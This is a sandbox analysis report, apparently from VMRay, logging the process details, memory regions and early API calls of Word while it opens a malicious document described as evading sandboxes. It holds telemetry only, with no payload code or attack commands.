Malicious Word Doc. Uses Multiple Sandbox Evasion Techniques | Sequential Behavior
Try VMRay Analyzer
Monitored Processes
Behavior Information - Sequential View
Process #1: winword.exe
(Host: 188, Network: 0)
+
Information Value
ID #1
File Name c:\program files\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:08, Reason: Analysis Target
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:10:05
OS Process Information
+
Information Value
PID 0x954
Parent PID 0x584 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 9DC
0x 9D8
0x 9D4
0x 9D0
0x 9CC
0x 9C8
0x 9C0
0x 9AC
0x 99C
0x 994
0x 990
0x 958
0x 9F8
0x 9FC
0x A00
0x A04
0x A08
0x A0C
0x A4C
0x A58
0x 714
0x 93C
0x 8F8
0x 124
0x 924
0x B04
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000000020000 0x00020000 0x00020fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000040000 0x00040000 0x00043fff Pagefile Backed Memory Readable False False False
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False
pagefile_0x00000000000c0000 0x000c0000 0x000c0fff Pagefile Backed Memory Readable False False False
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable False False False
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable False False False
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000000100000 0x00100000 0x00106fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000110000 0x00110000 0x00111fff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable False False False
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable False False False
pagefile_0x0000000000140000 0x00140000 0x00141fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000150000 0x00150000 0x00151fff Pagefile Backed Memory Readable False False False
private_0x0000000000160000 0x00160000 0x0016ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000170000 0x00170000 0x00172fff Pagefile Backed Memory Readable False False False
private_0x0000000000180000 0x00180000 0x0018ffff Private Memory - False False False
private_0x0000000000190000 0x00190000 0x0028ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000290000 0x00290000 0x00292fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000002a0000 0x002a0000 0x002a2fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000002b0000 0x002b0000 0x002b2fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000002c0000 0x002c0000 0x002c2fff Pagefile Backed Memory Readable False False False
private_0x00000000002d0000 0x002d0000 0x0030ffff Private Memory Readable, Writable False False False
private_0x0000000000310000 0x00310000 0x0031efff Private Memory Readable, Writable True True False
pagefile_0x0000000000320000 0x00320000 0x00321fff Pagefile Backed Memory Readable False False False
private_0x0000000000360000 0x00360000 0x0045ffff Private Memory Readable, Writable False False False
private_0x0000000000460000 0x00460000 0x0055ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000560000 0x00560000 0x006e7fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000006f0000 0x006f0000 0x00870fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000880000 0x00880000 0x01c7ffff Pagefile Backed Memory Readable False False False
sortdefault.nls 0x01c80000 0x01f4efff Memory Mapped File Readable False False False
pagefile_0x0000000001f50000 0x01f50000 0x02342fff Pagefile Backed Memory Readable False False False
private_0x0000000002350000 0x02350000 0x0244ffff Private Memory Readable, Writable False False False
pagefile_0x0000000002450000 0x02450000 0x0252efff Pagefile Backed Memory Readable False False False
private_0x0000000002540000 0x02540000 0x0254ffff Private Memory Readable, Writable False False False
private_0x0000000002580000 0x02580000 0x02580fff Private Memory Readable, Writable False False False
private_0x0000000002590000 0x02590000 0x0268ffff Private Memory Readable, Writable False False False
private_0x0000000002690000 0x02690000 0x0270ffff Private Memory Readable, Writable False False False
pagefile_0x0000000002780000 0x02780000 0x02784fff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000002790000 0x02790000 0x02790fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000027a0000 0x027a0000 0x027a0fff Pagefile Backed Memory Readable False False False
private_0x00000000027b0000 0x027b0000 0x027b0fff Private Memory Readable, Writable False False False
private_0x00000000027c0000 0x027c0000 0x028bffff Private Memory Readable, Writable False False False
kernelbase.dll.mui 0x028c0000 0x0297ffff Memory Mapped File Readable, Writable False False False
pagefile_0x0000000002980000 0x02980000 0x02981fff Pagefile Backed Memory Readable False False False
cfgmgr32.dll 0x02990000 0x029c5fff Memory Mapped File Readable, Writable, Executable False False False
private_0x00000000029d0000 0x029d0000 0x029dffff Private Memory Readable, Writable False False False
private_0x00000000029e0000 0x029e0000 0x02adffff Private Memory Readable, Writable False False False
msxml6r.dll 0x02ae0000 0x02ae0fff Memory Mapped File Readable False False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db 0x02af0000 0x02b14fff Memory Mapped File Readable False False False
private_0x0000000002c20000 0x02c20000 0x02e1ffff Private Memory Readable, Writable False False False
pagefile_0x0000000002e20000 0x02e20000 0x02e20fff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000002e30000 0x02e30000 0x02e31fff Pagefile Backed Memory Readable False False False
private_0x0000000002e40000 0x02e40000 0x02e40fff Private Memory Readable, Writable False False False
c_1255.nls 0x02e50000 0x02e60fff Memory Mapped File Readable False False False
private_0x0000000002e70000 0x02e70000 0x02e8ffff Private Memory - False False False
onbttnwd.dll 0x02e90000 0x02e94fff Memory Mapped File Readable False False False
private_0x0000000002ea0000 0x02ea0000 0x02ebefff Private Memory Readable, Writable False False False
private_0x0000000002ea0000 0x02ea0000 0x02eaffff Private Memory Readable, Writable True True False
private_0x0000000002ec0000 0x02ec0000 0x02f3ffff Private Memory Readable, Writable False False False
private_0x0000000002f40000 0x02f40000 0x0303ffff Private Memory Readable, Writable False False False
private_0x0000000003040000 0x03040000 0x0313ffff Private Memory Readable, Writable False False False
private_0x0000000003140000 0x03140000 0x0315ffff Private Memory - False False False
private_0x0000000003160000 0x03160000 0x0317ffff Private Memory - False False False
stdole2.tlb 0x03180000 0x03183fff Memory Mapped File Readable False False False
private_0x0000000003190000 0x03190000 0x0328ffff Private Memory Readable, Writable False False False
private_0x0000000003290000 0x03290000 0x0338ffff Private Memory Readable, Writable False False False
pagefile_0x0000000003390000 0x03390000 0x0378ffff Pagefile Backed Memory Readable False False False
staticcache.dat 0x03790000 0x040bffff Memory Mapped File Readable False False False
private_0x00000000040c0000 0x040c0000 0x040dffff Private Memory - False False False
private_0x00000000040f0000 0x040f0000 0x0410efff Private Memory Readable, Writable True True False
private_0x0000000004100000 0x04100000 0x04101fff Private Memory Readable, Writable True True False
private_0x0000000004110000 0x04110000 0x0412efff Private Memory Readable, Writable True True False
private_0x0000000004120000 0x04120000 0x04121fff Private Memory Readable, Writable True True False
private_0x0000000004130000 0x04130000 0x0422ffff Private Memory Readable, Writable False False False
segoeui.ttf 0x04230000 0x042aefff Memory Mapped File Readable False False False
private_0x00000000042b0000 0x042b0000 0x042cdfff Private Memory Readable, Writable True True False
private_0x00000000042c0000 0x042c0000 0x042c1fff Private Memory Readable, Writable True True False
private_0x00000000042e0000 0x042e0000 0x042effff Private Memory Readable, Writable False False False
private_0x0000000004310000 0x04310000 0x0432efff Private Memory Readable, Writable True True False
private_0x0000000004320000 0x04320000 0x04321fff Private Memory Readable, Writable True True False
private_0x0000000004350000 0x04350000 0x0436efff Private Memory Readable, Writable True True False
private_0x0000000004360000 0x04360000 0x04361fff Private Memory Readable, Writable True True False
private_0x0000000004390000 0x04390000 0x04391fff Private Memory Readable, Writable True True False
private_0x00000000043a0000 0x043a0000 0x043a1fff Private Memory Readable, Writable True True False
private_0x00000000043d0000 0x043d0000 0x043dffff Private Memory Readable, Writable False False False
private_0x00000000043e0000 0x043e0000 0x044dffff Private Memory Readable, Writable False False False
private_0x00000000044e0000 0x044e0000 0x044fefff Private Memory Readable, Writable True True False
private_0x00000000044f0000 0x044f0000 0x044f1fff Private Memory Readable, Writable True True False
private_0x0000000004500000 0x04500000 0x0451dfff Private Memory Readable, Writable True True False
private_0x0000000004510000 0x04510000 0x04511fff Private Memory Readable, Writable True True False
private_0x0000000004520000 0x04520000 0x0459ffff Private Memory Readable, Writable, Executable False False False
pagefile_0x00000000045a0000 0x045a0000 0x04d9ffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000004da0000 0x04da0000 0x04dc0fff Private Memory Readable, Writable True True False
private_0x0000000004da0000 0x04da0000 0x04da1fff Private Memory Readable, Writable True True False
private_0x0000000004dc0000 0x04dc0000 0x04dc1fff Private Memory Readable, Writable True True False
private_0x0000000004e60000 0x04e60000 0x04e7efff Private Memory Readable, Writable True True False
private_0x0000000004e60000 0x04e60000 0x04e61fff Private Memory Readable, Writable True True False
private_0x0000000004e80000 0x04e80000 0x04e87fff Private Memory Readable, Writable True True False
private_0x0000000004e90000 0x04e90000 0x04f8ffff Private Memory Readable, Writable False False False
private_0x0000000005030000 0x05030000 0x05032fff Private Memory Readable, Writable True True False
private_0x0000000005050000 0x05050000 0x0506efff Private Memory Readable, Writable True True False
private_0x0000000005050000 0x05050000 0x05051fff Private Memory Readable, Writable True True False
private_0x0000000005060000 0x05060000 0x05061fff Private Memory Readable, Writable True True False
private_0x0000000005080000 0x05080000 0x0517ffff Private Memory Readable, Writable False False False
private_0x0000000005090000 0x05090000 0x05091fff Private Memory Readable, Writable True True False
private_0x00000000050a0000 0x050a0000 0x050a1fff Private Memory Readable, Writable True True False
private_0x00000000050c0000 0x050c0000 0x050c1fff Private Memory Readable, Writable True True False
private_0x00000000050d0000 0x050d0000 0x050d1fff Private Memory Readable, Writable True True False
private_0x00000000050f0000 0x050f0000 0x050f1fff Private Memory Readable, Writable True True False
private_0x0000000005100000 0x05100000 0x05101fff Private Memory Readable, Writable True True False
private_0x0000000005120000 0x05120000 0x05121fff Private Memory Readable, Writable True True False
private_0x0000000005130000 0x05130000 0x05131fff Private Memory Readable, Writable True True False
private_0x0000000005150000 0x05150000 0x05151fff Private Memory Readable, Writable True True False
private_0x0000000005160000 0x05160000 0x05161fff Private Memory Readable, Writable True True False
private_0x00000000051c0000 0x051c0000 0x052bffff Private Memory Readable, Writable False False False
private_0x00000000051c0000 0x051c0000 0x051c1fff Private Memory Readable, Writable True True False
private_0x00000000051e0000 0x051e0000 0x051e1fff Private Memory Readable, Writable True True False
private_0x00000000052d0000 0x052d0000 0x052dffff Private Memory Readable, Writable False False False
private_0x0000000005360000 0x05360000 0x0539ffff Private Memory Readable, Writable True True False
private_0x00000000053a0000 0x053a0000 0x0549ffff Private Memory Readable, Writable False False False
private_0x00000000054a0000 0x054a0000 0x0589ffff Private Memory Readable, Writable False False False
pagefile_0x00000000058a0000 0x058a0000 0x0689ffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000006960000 0x06960000 0x06963fff Private Memory Readable, Writable True True False
private_0x0000000006970000 0x06970000 0x069effff Private Memory Readable, Writable False False False
private_0x00000000069f0000 0x069f0000 0x069f3fff Private Memory Readable, Writable True True False
private_0x0000000006a00000 0x06a00000 0x06a03fff Private Memory Readable, Writable True True False
private_0x0000000006a10000 0x06a10000 0x06a8ffff Private Memory Readable, Writable False False False
private_0x0000000006a90000 0x06a90000 0x06b8ffff Private Memory Readable, Writable False False False
private_0x0000000006b90000 0x06b90000 0x06b93fff Private Memory Readable, Writable True True False
private_0x0000000006ba0000 0x06ba0000 0x06ba3fff Private Memory Readable, Writable True True False
private_0x0000000006bb0000 0x06bb0000 0x06c2ffff Private Memory Readable, Writable False False False
private_0x0000000006cb0000 0x06cb0000 0x06cc0fff Private Memory Readable, Writable True True False
private_0x0000000006cd0000 0x06cd0000 0x06cd0fff Private Memory Readable, Writable True True False
private_0x0000000006ce0000 0x06ce0000 0x06ddffff Private Memory Readable, Writable False False False
private_0x0000000006e00000 0x06e00000 0x06e7ffff Private Memory Readable, Writable False False False
private_0x0000000006e80000 0x06e80000 0x0727ffff Private Memory Readable, Writable False False False
private_0x0000000007280000 0x07280000 0x07a7ffff Private Memory Readable, Writable False False False
private_0x0000000007a80000 0x07a80000 0x07e80fff Private Memory Readable, Writable False False False
private_0x0000000007e90000 0x07e90000 0x08290fff Private Memory Readable, Writable False False False
private_0x00000000082a0000 0x082a0000 0x086a0fff Private Memory Readable, Writable False False False
private_0x00000000086b0000 0x086b0000 0x088affff Private Memory Readable, Writable False False False
private_0x00000000088b0000 0x088b0000 0x08d6ffff Private Memory Readable, Writable False False False
private_0x0000000008d70000 0x08d70000 0x0916ffff Private Memory Readable, Writable False False False
private_0x0000000009ac0000 0x09ac0000 0x09ad0fff Private Memory Readable, Writable True True False
private_0x0000000009ac0000 0x09ac0000 0x09b1afff Private Memory Readable, Writable True True False
private_0x0000000009ae0000 0x09ae0000 0x09ae1fff Private Memory Readable, Writable True True False
private_0x0000000009b00000 0x09b00000 0x09b01fff Private Memory Readable, Writable True True False
private_0x0000000009b20000 0x09b20000 0x09b21fff Private Memory Readable, Writable True True False
private_0x0000000009fa0000 0x09fa0000 0x09ffafff Private Memory Readable, Writable True True False
private_0x0000000009fa0000 0x09fa0000 0x09ffafff Private Memory Readable, Writable True True False
private_0x0000000009fa0000 0x09fa0000 0x09fa1fff Private Memory Readable, Writable True True False
private_0x0000000009fc0000 0x09fc0000 0x09fc1fff Private Memory Readable, Writable True True False
private_0x000000000a000000 0x0a000000 0x0a001fff Private Memory Readable, Writable True True False
private_0x000000000a370000 0x0a370000 0x0a371fff Private Memory Readable, Writable True True False
private_0x000000000a700000 0x0a700000 0x0abb1fff Private Memory Readable, Writable True True False
private_0x000000000ab90000 0x0ab90000 0x0ab91fff Private Memory Readable, Writable True True False
private_0x000000000abb0000 0x0abb0000 0x0abb1fff Private Memory Readable, Writable True True False
private_0x000000000cec0000 0x0cec0000 0x0cfbffff Private Memory Readable, Writable True True False
private_0x000000000f660000 0x0f660000 0x0f75ffff Private Memory Readable, Writable True True False
private_0x0000000036e80000 0x36e80000 0x36e8ffff Private Memory Readable, Writable, Executable False False False
private_0x000000006fff0000 0x6fff0000 0x6fffffff Private Memory Readable, Writable, Executable False False False
osppc.dll 0x744a0000 0x744d2fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76e70000 0x76f69fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76f70000 0x7708efff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x77260000 0x77266fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable False False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable False False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable False False False
winword.exe 0x13fc00000 0x13fddafff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007febe960000 0x7febe960000 0x7febe96ffff Private Memory Readable, Writable, Executable False False False
chart.dll 0x7fee39d0000 0x7fee44c8fff Memory Mapped File Readable, Writable, Executable False False False
riched20.dll 0x7fee44d0000 0x7fee46f2fff Memory Mapped File Readable, Writable, Executable False False False
onbttnwd.dll 0x7fee4860000 0x7fee4899fff Memory Mapped File Readable, Writable, Executable False False False
mscoreei.dll 0x7fee48a0000 0x7fee4938fff Memory Mapped File Readable, Writable, Executable False False False
dwrite.dll 0x7fee4940000 0x7fee4abdfff Memory Mapped File Readable, Writable, Executable False False False
d3d10warp.dll 0x7fee4ac0000 0x7fee4c8ffff Memory Mapped File Readable, Writable, Executable False False False
msptls.dll 0x7fee4c90000 0x7fee4dfffff Memory Mapped File Readable, Writable, Executable False False False
msointl.dll 0x7fee4e00000 0x7fee4f7afff Memory Mapped File Readable, Writable, Executable False False False
wwintl.dll 0x7fee4f80000 0x7fee503bfff Memory Mapped File Readable, Writable, Executable False False False
msores.dll 0x7fee5040000 0x7fee9e7efff Memory Mapped File Readable, Writable, Executable False False False
mso99lres.dll 0x7fee9e80000 0x7feea7a0fff Memory Mapped File Readable, Writable, Executable False False False
mso40uires.dll 0x7feea7b0000 0x7feeaab7fff Memory Mapped File Readable, Writable, Executable False False False
mso.dll 0x7feeaac0000 0x7feebd9bfff Memory Mapped File Readable, Writable, Executable False False False
mso99lwin32client.dll 0x7feebda0000 0x7feec56bfff Memory Mapped File Readable, Writable, Executable False False False
mso40uiwin32client.dll 0x7feec570000 0x7feece5afff Memory Mapped File Readable, Writable, Executable False False False
mso30win32client.dll 0x7feece60000 0x7feed2d7fff Memory Mapped File Readable, Writable, Executable False False False
mso20win32client.dll 0x7feed2e0000 0x7feed5e3fff Memory Mapped File Readable, Writable, Executable False False False
oart.dll 0x7feed5f0000 0x7feee75bfff Memory Mapped File Readable, Writable, Executable False False False
d3d11.dll 0x7feee7d0000 0x7feee895fff Memory Mapped File Readable, Writable, Executable False False False
wwlib.dll 0x7feee8a0000 0x7fef0c3efff Memory Mapped File Readable, Writable, Executable False False False
mscoree.dll 0x7fef10e0000 0x7fef114efff Memory Mapped File Readable, Writable, Executable False False False
sppc.dll 0x7fef1150000 0x7fef1176fff Memory Mapped File Readable, Writable, Executable False False False
mlang.dll 0x7fef1260000 0x7fef129afff Memory Mapped File Readable, Writable, Executable False False False
npmproxy.dll 0x7fef3780000 0x7fef378bfff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-file-l1-2-0.dll 0x7fef3bb0000 0x7fef3bb2fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-processthreads-l1-1-1.dll 0x7fef3bc0000 0x7fef3bc2fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-synch-l1-2-0.dll 0x7fef3d90000 0x7fef3d92fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-localization-l1-2-0.dll 0x7fef3da0000 0x7fef3da2fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-file-l2-1-0.dll 0x7fef3db0000 0x7fef3db2fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-timezone-l1-1-0.dll 0x7fef3dc0000 0x7fef3dc2fff Memory Mapped File Readable, Writable, Executable False False False
ucrtbase.dll 0x7fef3dd0000 0x7fef3ec1fff Memory Mapped File Readable, Writable, Executable False False False
msimg32.dll 0x7fef3ed0000 0x7fef3ed6fff Memory Mapped File Readable, Writable, Executable False False False
c2r64.dll 0x7fef3ee0000 0x7fef4008fff Memory Mapped File Readable, Writable, Executable False False False
appvisvstream64.dll 0x7fef4010000 0x7fef4089fff Memory Mapped File Readable, Writable, Executable False False False
appvisvsubsystems64.dll 0x7fef4090000 0x7fef42c5fff Memory Mapped File Readable, Writable, Executable False False False
msxml6.dll 0x7fef4a60000 0x7fef4c51fff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x7fef4cf0000 0x7fef4d60fff Memory Mapped File Readable, Writable, Executable False False False
msointl30.dll 0x7fef5270000 0x7fef527efff Memory Mapped File Readable, Writable, Executable False False False
wbemsvc.dll 0x7fef5740000 0x7fef5753fff Memory Mapped File Readable, Writable, Executable False False False
wbemprox.dll 0x7fef5a40000 0x7fef5a4efff Memory Mapped File Readable, Writable, Executable False False False
ntdsapi.dll 0x7fef5a50000 0x7fef5a76fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007fffff74000 0x7fffff74000 0x7fffff75fff Private Memory Readable, Writable True True False
private_0x000007fffff7c000 0x7fffff7c000 0x7fffff7dfff Private Memory Readable, Writable True True False
For performance reasons, the remaining 301 entries are omitted.
The remaining entries can be found in flog.txt.
Threads
Thread 0x958
(Host: 171, Network: 0)
+
Category Operation Information Success Count Logfile
Module Get Handle module_name = Unknown module name, base_address = 0x7fef8cd0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsiProvideQualifiedComponentA, address_out = 0x7fef8d53b3c True 1
Fn
Module Get Address module_name = Unknown module name, function = MsiGetProductCodeA, address_out = 0x7fef8d4a13c True 1
Fn
Module Get Address module_name = Unknown module name, function = MsiReinstallFeatureA, address_out = 0x7fef8d51618 True 1
Fn
Module Get Address module_name = Unknown module name, function = MsiProvideComponentA, address_out = 0x7fef8d4f088 True 1
Fn
Module Get Handle module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x0 False 1
Fn
Module Load module_name = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL, base_address = 0x7fee3560000 True 1
Fn
Environment Get Environment String name = DDRYBUR False 1
Fn
Module Get Filename process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Registry Open Key reg_name = HKEY_CLASSES_ROOT\Licenses True 1
Fn
Registry Read Value reg_name = HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7, data = } False 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\system32\user32.dll, base_address = 0x76e70000 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = GetSystemMetrics, address_out = 0x76e894f0 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = MonitorFromWindow, address_out = 0x76e85f08 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = MonitorFromRect, address_out = 0x76e82b00 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = MonitorFromPoint, address_out = 0x76e7ab64 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = EnumDisplayMonitors, address_out = 0x76e85c30 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = GetMonitorInfoA, address_out = 0x76e7a730 True 1
Fn
Module Get Address module_name = c:\windows\system32\user32.dll, function = EnumDisplayDevicesA, address_out = 0x76e7a5b4 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = oleaut32.dll, base_address = 0x7feff1c0000 True 1
Fn
Module Get Address module_name = Unknown module name, function = DispCallFunc, address_out = 0x7feff1c2270 True 1
Fn
Module Get Address module_name = Unknown module name, function = LoadTypeLibEx, address_out = 0x7feff1ca550 True 1
Fn
Module Get Address module_name = Unknown module name, function = UnRegisterTypeLib, address_out = 0x7feff2520d0 True 1
Fn
Module Get Address module_name = Unknown module name, function = CreateTypeLib2, address_out = 0x7feff24dbd0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDateFromUdate, address_out = 0x7feff1c5c90 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarUdateFromDate, address_out = 0x7feff1c6330 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetAltMonthNames, address_out = 0x7feff1e66c0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarNumFromParseNum, address_out = 0x7feff1c4710 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarParseNumFromStr, address_out = 0x7feff1c48f0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecFromR4, address_out = 0x7feff1fb640 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecFromR8, address_out = 0x7feff1fb360 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecFromDate, address_out = 0x7feff202640 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecFromI4, address_out = 0x7feff1e58a0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecFromCy, address_out = 0x7feff1e5820 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarR4FromDec, address_out = 0x7feff1faf20 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetRecordInfoFromTypeInfo, address_out = 0x7feff21a0c0 True 1
Fn
Module Get Address module_name = Unknown module name, function = GetRecordInfoFromGuids, address_out = 0x7feff252160 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayGetRecordInfo, address_out = 0x7feff1e5af0 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArraySetRecordInfo, address_out = 0x7feff1e5a90 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayGetIID, address_out = 0x7feff1e5a60 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArraySetIID, address_out = 0x7feff1e5a30 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayCopyData, address_out = 0x7feff1c60b0 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayAllocDescriptorEx, address_out = 0x7feff1c3e90 True 1
Fn
Module Get Address module_name = Unknown module name, function = SafeArrayCreateEx, address_out = 0x7feff219f80 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormat, address_out = 0x7feff249b20 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormatDateTime, address_out = 0x7feff249aa0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormatNumber, address_out = 0x7feff249990 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormatPercent, address_out = 0x7feff249890 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFormatCurrency, address_out = 0x7feff249770 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarWeekdayName, address_out = 0x7feff22b8d0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarMonthName, address_out = 0x7feff22b800 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarAdd, address_out = 0x7feff2448e0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarAnd, address_out = 0x7feff249470 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarCat, address_out = 0x7feff2496a0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDiv, address_out = 0x7feff242fe0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarEqv, address_out = 0x7feff249cf0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarIdiv, address_out = 0x7feff248ff0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarImp, address_out = 0x7feff249c00 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarMod, address_out = 0x7feff248e60 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarMul, address_out = 0x7feff243690 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarOr, address_out = 0x7feff2492d0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarPow, address_out = 0x7feff242e80 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarSub, address_out = 0x7feff243f90 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarXor, address_out = 0x7feff2491a0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarAbs, address_out = 0x7feff227c30 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarFix, address_out = 0x7feff227a60 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarInt, address_out = 0x7feff227890 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarNeg, address_out = 0x7feff227ea0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarNot, address_out = 0x7feff249600 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarRound, address_out = 0x7feff2276a0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarCmp, address_out = 0x7feff2483f0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecAdd, address_out = 0x7feff1f3070 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarDecCmp, address_out = 0x7feff1fd700 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarBstrCat, address_out = 0x7feff1fd890 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarCyMulI4, address_out = 0x7feff1dcaf0 True 1
Fn
Module Get Address module_name = Unknown module name, function = VarBstrCmp, address_out = 0x7feff1e8a00 True 1
Fn
Module Get Handle module_name = ole32.dll, base_address = 0x7fefe810000 True 1
Fn
Module Get Address module_name = Unknown module name, function = CoCreateInstanceEx, address_out = 0x7fefe81de90 True 1
Fn
Module Get Address module_name = Unknown module name, function = CLSIDFromProgIDEx, address_out = 0x7fefe82a4c4 True 1
Fn
System Get Time type = Local Time, time = 2018-01-10 10:49:07 (Local Time) True 2
Fn
